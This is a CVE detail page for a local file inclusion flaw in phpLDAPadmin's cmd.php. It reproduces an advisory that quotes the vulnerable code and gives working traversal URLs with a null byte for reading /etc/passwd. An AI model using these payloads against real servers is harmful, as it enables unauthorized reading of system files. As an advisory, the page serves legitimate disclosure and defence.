CVE-2009-4427 : Detail

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

######################################################################## # PHPLDAPADMIN LOCAL FILE INCLUSION ######################################################################## author : ipsecs website : http://ipsecs.com Date : December, 10th, 2009 -[i]- Description "Phpldapadmin is web based LDAP client which provides easy, anywhere-accessible, multi-language administration for LDAP server." http://phpldapadmin.sourceforge.net vulnerable version: phpldapadmin 1.1.0.5 Ubuntu 8.10 Debian 5.0 Other version may be affected -[ii]- Vulnerable Code Vulnerable code is found in cmd.php which doesn't sanitize URI parameter provided by user input. line 10 $www['cmd'] = get_request('cmd','REQUEST'); line 22-27 if (defined('HOOKSDIR') && file_exists(HOOKSDIR.$www['cmd'].'.php')) $file = HOOKSDIR.$www['cmd'].'.php'; elseif (defined('HTDOCDIR') && file_exists(HTDOCDIR.$www['cmd'].'.php')) $file = HTDOCDIR.$www['cmd'].'.php'; line 38-39 if ($file) include $file; Attacker may view any arbitrary files trough 'cmd' parameter in URI request. -[iii]- Exploit http://server/phpldapadmin/cmd.php?cmd=../../../../etc/passwd%00 http://server/phpldapadmin/cmd.php?cmd=../../../../issue%00 -[iv]- Fix Sanitize $file before being included. Unfortunaltely there is no working patch at this time.